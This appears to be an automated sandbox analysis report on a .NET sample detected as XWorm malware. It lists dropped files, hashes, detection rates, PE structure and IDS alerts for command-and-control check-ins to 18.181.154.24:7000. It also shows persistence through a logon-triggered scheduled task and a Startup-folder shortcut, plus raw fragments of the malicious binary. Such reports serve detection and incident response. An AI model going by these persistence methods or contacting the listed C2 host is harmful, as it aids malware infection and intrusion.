                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                      C:\Users\user\AppData\Local\Temp\tmpAD87.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                      C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                      C:\Users\user\AppData\Local\Temp\tmpE11A.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                      C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450048
                                                                      Entropy (8bit):7.90029136666667
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      MD5:BF7866489443A237806A4D3D5701CDF3
                                                                      SHA1:FFBE2847590E876892B41585784B40144C224160
                                                                      SHA-256:1070BF3C0F917624660BEF57D24E6B2CF982DCE067E95EB8A041586C0F41A095
                                                                      SHA-512:E9BB9D5157D2011EED5F5013AF4145877E3237DEF266F2CC6FD769ED7065A4FA227F7D316DE5FC7EEAE8F3F852B685FB3CC166127F79134F1FA1A200B8C0C186
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                      • Antivirus: Virustotal, Detection: 55%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."(<g..............0.............V.... ........@.. .......................@............@.....................................O.......L.................... ..........T............................................ ............... ..H............text...\.... ...................... ..`.rsrc...L...........................@..@.reloc....... ......................@..B................6.......H........}...O......i....................................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 25 04:25:02 2024, mtime=Mon Nov 25 04:25:03 2024, atime=Mon Nov 25 04:25:03 2024, length=450048, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):806
                                                                      Entropy (8bit):5.106269322557677
                                                                      Encrypted:false
                                                                      SSDEEP:12:8BlC8m8ZCM4LuSWCbdY//8xSLnmi8TSjEjABrH+ifp4TBmV:8zQuY+UW3hQABy3TBm
                                                                      MD5:C22CE3514EB3ADF537C8EB8AEFEF0620
                                                                      SHA1:70CDDB00F18F88668F5CE5F59D892908D50D9346
                                                                      SHA-256:D00885E42B2430E817CA1884600DC35E97BB72D8B410728B7BA522D43D14BE75
                                                                      SHA-512:25F4A8C7A04D14B1C3A6D7BDAC974E841B9B86D0A1F1122746CAB937BD6BADD6757F0543210CEA619EA3B74B1127F39B2F8596282FA76015ABBFFCCF3FBFC1D5
                                                                      Malicious:false
                                                                      Preview:L..................F.... ...X..`.>...da.>...da.>............................:..DG..Yr?.D..U..k0.&...&......vk.v....L}>Y.>....pa.>......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY.+...........................%..A.p.p.D.a.t.a...B.V.1.....yY.+..Roaming.@......CW.^yY.+..........................b.0.R.o.a.m.i.n.g.....t.2.....yY"+ .9758XB~1.EXE..X......yY"+yY"+............................W.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.......a...............-.......`...........P`.d.....C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe..".....\.....\.....\.....\.....\.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.`.......X.......302494...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                      C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450048
                                                                      Entropy (8bit):7.90029136666667
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      MD5:BF7866489443A237806A4D3D5701CDF3
                                                                      SHA1:FFBE2847590E876892B41585784B40144C224160
                                                                      SHA-256:1070BF3C0F917624660BEF57D24E6B2CF982DCE067E95EB8A041586C0F41A095
                                                                      SHA-512:E9BB9D5157D2011EED5F5013AF4145877E3237DEF266F2CC6FD769ED7065A4FA227F7D316DE5FC7EEAE8F3F852B685FB3CC166127F79134F1FA1A200B8C0C186
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                      • Antivirus: Virustotal, Detection: 55%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."(<g..............0.............V.... ........@.. .......................@............@.....................................O.......L.................... ..........T............................................ ............... ..H............text...\.... ...................... ..`.rsrc...L...........................@..@.reloc....... ......................@..B................6.......H........}...O......i....................................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.

                                                                      C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.46583317555289
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YIXfpi67eLPU9skLmb0b4BWSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbU:NXD94BWlLZMM6YFHr+U
                                                                      MD5:8241812D351C515A1C514F8B0FB8F05E
                                                                      SHA1:65054D06CC9F5191B4D3C6C7AD5E290895B4CFE0
                                                                      SHA-256:74C0720D36D916D7D3A30C8367409113C1C9EDC7FA0E5B0CD8BCFCF211681E65
                                                                      SHA-512:7DD8B8DBCCD563344046F9D2E20488A5F4F8D8844DE00656571D1D67332C5F8DAE6270BF4C0BD0340C7B3A5B9245E9D7F307064D148FB8BCFCD6447ECF667151
                                                                      Malicious:false
                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....>..............................................................................................................................................................................................................................................................................................................................................ZG..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.90029136666667
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:9758xBqgE1azKnB.exe
                                                                      File size:450'048 bytes
                                                                      MD5:bf7866489443a237806a4d3d5701cdf3
                                                                      SHA1:ffbe2847590e876892b41585784b40144c224160
                                                                      SHA256:1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
                                                                      SHA512:e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      TLSH:5FA4029062AC8FBBE0BD9FF26166B05027F6396F2421F24D5FC261DD296AF006350B57
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."(<g..............0.............V.... ........@.. .......................@............@................................

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x46f056
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673C2822 [Tue Nov 19 05:54:42 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6f0020x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x64c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x6cf000x54.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x6d05c0x6d200f364872a41e4bf9fc09cdf5f01041c39False0.9330747064719358data7.9146348506405895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x700000x64c0x800cbc4a37c85e29bb1836ef7fda56f9d3fFalse0.34228515625data3.5159313995256327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x720000xc0x200711c25bdf113b2ff00e49977e3c95b33False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x700900x3bcdata0.41527196652719667
                                                                      RT_MANIFEST0x7045c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-25T06:25:13.034497+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:25:13.034497+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:25:15.971536+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973518.181.154.247000TCP
                                                                      2024-11-25T06:25:43.034632+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:25:43.034632+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:26:13.077926+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:26:13.077926+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:26:18.498577+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44973518.181.154.247000TCP
                                                                      2024-11-25T06:26:43.062445+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:26:43.062445+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:27:13.042930+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:27:13.042930+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:27:43.059424+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:27:43.059424+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:28:13.069282+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes118.181.154.247000192.168.2.449735TCP
                                                                      2024-11-25T06:28:13.069282+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2118.181.154.247000192.168.2.449735TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 25, 2024 06:25:04.539885998 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:04.660733938 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:04.660821915 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:04.789459944 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:04.908958912 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:13.034497023 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:13.078707933 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:15.971535921 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:16.091023922 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:27.157812119 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:27.277409077 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:38.328963995 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:38.449665070 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:43.034631968 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:25:43.079014063 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:49.500915051 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:25:49.620454073 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:00.672759056 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:00.793092012 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:11.843012094 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:11.962661982 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:12.501064062 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:12.621624947 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:13.077925920 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:13.125720024 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:13.910507917 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:14.030282974 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:14.236398935 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:14.355921984 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:15.465199947 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:15.584654093 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:17.013791084 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:17.134289026 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:17.639235020 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:17.758727074 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:18.328562975 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:18.448131084 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:18.498577118 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:18.618113041 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:18.919617891 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:19.039146900 CET70004973518.181.154.24192.168.2.4
